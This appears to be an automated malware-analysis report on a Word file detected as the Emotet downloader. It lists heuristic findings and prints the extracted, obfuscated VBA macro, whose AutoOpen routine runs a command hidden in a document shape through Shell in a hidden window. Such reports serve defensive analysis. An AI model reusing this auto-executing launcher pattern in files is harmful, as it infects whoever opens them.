MALICIOUS
210
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6751471-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6751471-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
"nF", "I", "AK", "rv", "Wf", "A", "Qj", "n") Shell avMzMpkdzzz + pkVOF + frjPQHm, 0 QKYHKNMwj = Array("D", "QI", "P", "Y", "vz", "i", "Nw", "Ok", _ -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub AutoOpen() FURKKkS = Array("X", "o", "K", "S", "R", "Bk", "O", "Rk", _ -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6677 bytes |
SHA-256: 3d5b7a37bd47b037fda0e6288462dffbdd94328de44a7331d051d1235284afd8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "sVrKActD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function qQREiEk()
VpMPfPhEK = Array("Fl", "oi", "Ya", "C", "Wc", "M", "LB", "hz", _
"JV", "uQ", "rD", "j", "i", "po", "f", "QQ", _
"A", "w", "E", "C", "j", "d", "Fc", "I", _
"Om", "Vu", "M", "jW", "qV", "Q", "wJ", "h", _
"Mj", "Ac", "j", "VN", "N", "di", "hG", "mO", _
"j", "M", "I", "C", "T", "a", "C", "s", _
"S", "fD", "I", "d", "X", "zO", "Q", "To", _
"b", "RN", "s", "u", "m", "bc", "Mn", "H")
ijFhUd = Array("zK", "q", "W", "cN", "W", "n", "N", "B", _
"iI", "U", "w", "Q", "I", "wU", "dj", "i", _
"k", "wd", "d", "H", "f", "V", "D", "mU", _
"i", "SZ", "zd", "Ot", "XG", "i", "R", "l", _
"Er", "rG", "Pn", "vW", "JJ", "h", "Kj", "Ah", _
"j", "m", "D", "Qm", "Bp", "m", "b", "M", _
"qz", "W", "O", "jB", "G", "m", "Wc", "c", _
"M", "A", "I", "oU", "mZ", "r", "S", "i")
ZKucYS = Array("Sz", "w", "Sv", "Uc", "O", "M", "pI", "Cj", _
"Q", "Yb", "fp", "MR", "Z", "n", "z", "wf", _
"T", "N", "t", "w", "Um", "Vl", "CT", "WC", _
"Gt", "K", "p", "ZY", "Rj", "K", "AQ", "i", _
"j", "P", "Th", "jk", "D", "u", "Pa", "D", _
"D", "Z", "f", "S", "aG", "D", "nf", "v", _
"hr", "B", "o", "l", "ld", "It", "P", "FH", _
"k", "A", "MZ", "zZ", "Po", "w", "L", "BD")
avMzMpkdzzz = "" + wjllbD + nfhOAR + Shapes("ZjKXOJqWhKk").TextFrame.ContainingRange + bLLwN + ivJKBPIn
dIwCvHmO = Array("n", "aN", "Z", "j", "G", "sd", "q", "u", _
"vA", "VJ", "bY", "b", "Jv", "b", "Pk", "K", _
"Zj", "I", "vv", "F", "n", "Z", "Od", "j", _
"mi", "j", "P", "V", "z", "GE", "EV", "t", _
"O", "jX", "U", "JW", "NC", "AK", "v", "z", _
"tj", "iC", "B", "QU", "z", "EU", "F", "w", _
"R", "o", "Cv", "Fu", "I", "Q", "Tf", "B", _
"s", "E", "CG", "S", "fq", "l", "k", "nu")
WbasJLVj = Array("Z", "Zw", "i", "P", "ZG", "CS", "bd", "aj", _
"q", "l", "X", "E", "Pc", "G", "v", "u", _
"J", "Q", "b", "a", "T", "s", "f", "uz", _
"i", "nr", "E", "Qa", "Gi", "XV", "EY", "P", _
"Oz", "C", "Q", "i", "wF", "P", "f", "h", _
"A", "D", "L", "Y", "lX", "aF", "j", "U", _
"co", "ol", "qw", "W", "K", "ZX", "V", "kM", _
"ri", "i", "zI", "jY", "r", "fs", "L", "VL")
SbIvpiiW = Array("Ko", "zV", "F", "db", "av", "v", "Cz", "ic", _
"aY", "wE", "bl", "mz", "iC", "k", "B", "kk", _
"X", "X", "M", "mj", "oG", "NJ", "W", "d", _
"s", "Ca", "s", "sS", "oz", "tE", "h", "zP", _
"zC", "La", "oz", "nB", "U", "iU", "IL", "D", _
"u", "qO", "JI", "v", "N", "to", "P", "uE", _
"oz", "pY", "a", "vS", "vb", "IA", "M", "f", _
"Gs", "u", "wp", "W", "R", "I", "uL", "p")
CiwMD = Array("pl", "NS", "b", "I", "uE", "zS", "R", "Dw", _
"o", "RC", "QM", "s", "AZ", "zq", "Wr", "Bn", _
"NG", "vY", "pQ", "J", "Y", "u", "L", "wO", _
"Pi", "fG", "c", "uj", "v", "N", "KJ", "rX", _
"ba", "RM", "wN", "z", "mC", "i", "N", "WM", _
"W", "DM", "n", "N", "N", "q", "o", "D", _
"t", "f", "i", "HI", "D", "wv", "VL", "F", _
"nF", "I", "AK", "rv", "Wf", "A", "Qj", "n")
Shell avMzMpkdzzz + pkVOF + frjPQHm, 0
QKYHKNMwj = Array("D", "QI", "P", "Y", "vz", "i", "Nw", "Ok", _
"Oi", "C", "j", "Y", "n", "XQ", "F", "t", _
"v", "G", "XK", "wj", "tO", "zL", "IV", "N", _
"i", "tD", "Uc", "L", "LC", "T", "fm", "L", _
"G", "m", "GE", "LV", "k", "fP", "K", "Y", _
"qP", "Uo", "LY", "lP", "K", "Dz", "MP", "oq", _
"f", "F", "W", "HQ", "O", "Vu", "f", "vu", _
"zZ", "n", "B", "Rd", "zb", "zw", "S", "To")
iRfZFVZpa = Array("m", "w", "u", "z", "j", "zX", "j", "L", _
"UF", "t", "YQ", "V", "So", "up", "t", "X", _
"EI", "b", "z", "AH", "w", "u", "E", "Nb", _
"k", "rY", "f", "u", "JI", "P", "Qr", "B", _
"ji", "QR", "l", "t", "p", "A", "L", "OM", _
"mv", "CG", "wD", "id", "sj", "sX", "P", "Pf", _
"Tf", "E", "s", "w", "f", "Oq", "jV", "T", _
"B", "P", "wW", "Z", "iw", "UH", "c", "F")
GsFDF = Array("zt", "c", "l", "M", "qw", "wE", "m", "h", _
"lb", "C", "qO", "N", "zH", "W", "E", "Cj", _
"L", "G", "jk", "bc", "Ub", "U", "T", "qS", _
"Fa", "Ww", "mU", "Af", "kW", "M", "U", "z", _
"n", "TV", "j", "Bs", "s", "uF", "jj", "zz", _
"q", "Pk", "Bz", "w", "XT", "Sr", "B", "zu", _
"s", "mA", "Ql", "ln", "C", "wG", "l", "iu", _
"ua", "Q", "m", "Oi", "z", "z", "jc", "Ak")
End Function
Sub AutoOpen()
FURKKkS = Array("X", "o", "K", "S", "R", "Bk", "O", "Rk", _
"k", "Nz", "R", "L", "Nv", "Z", "jG", "wH", _
"D", "j", "h", "I", "I", "lA", "rz", "w", _
"v", "M", "aE", "u", "V", "H", "k", "f", _
"V", "z", "q", "m", "B", "vw", "fL", "U", _
"l", "Dp", "wm", "m", "A", "A", "ub", "Iw", _
"E", "Z", "Yb", "z", "qs", "Bh", "m", "f", _
"Df", "Wb", "j", "EC", "B", "N", "w", "T")
qQREiEk
MMcoLDFPT = Array("t", "D", "j", "Y", "WT", "c", "V", "S", _
"fN", "rX", "c", "O", "QZ", "bt", "wz", "LN", _
"N", "C", "d", "kJ", "i", "Wa", "j", "W", _
"ak", "W", "J", "rX", "FV", "HT", "zM", "Jj", _
"kF", "mh", "B", "Cn", "qk", "jr", "s", "mI", _
"Dl", "k", "w", "W", "N", "d", "M", "Uc", _
"q", "nR", "lX", "uI", "zY", "oq", "B", "wU", _
"q", "SQ", "Gb", "I", "Qc", "iG", "tR", "K")
dUoYf = Array("O", "D", "t", "H", "Rf", "Rn", "k", "Qk", _
"So", "dq", "Bj", "LQ", "KV", "po", "Tw", "Rf", _
"ia", "G", "Rh", "D", "Nh", "w", "d", "WU", _
"A", "Yw", "Wv", "w", "iA", "J", "PL", "FV", _
"Nv", "H", "S", "Nq", "V", "Mi", "C", "R", _
"V", "G", "P", "Z", "B", "Rz", "z", "nk", _
"o", "E", "G", "j", "D", "bt", "o", "wz", _
"G", "wu", "Eq", "Z", "E", "Wu", "r", "sC")
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.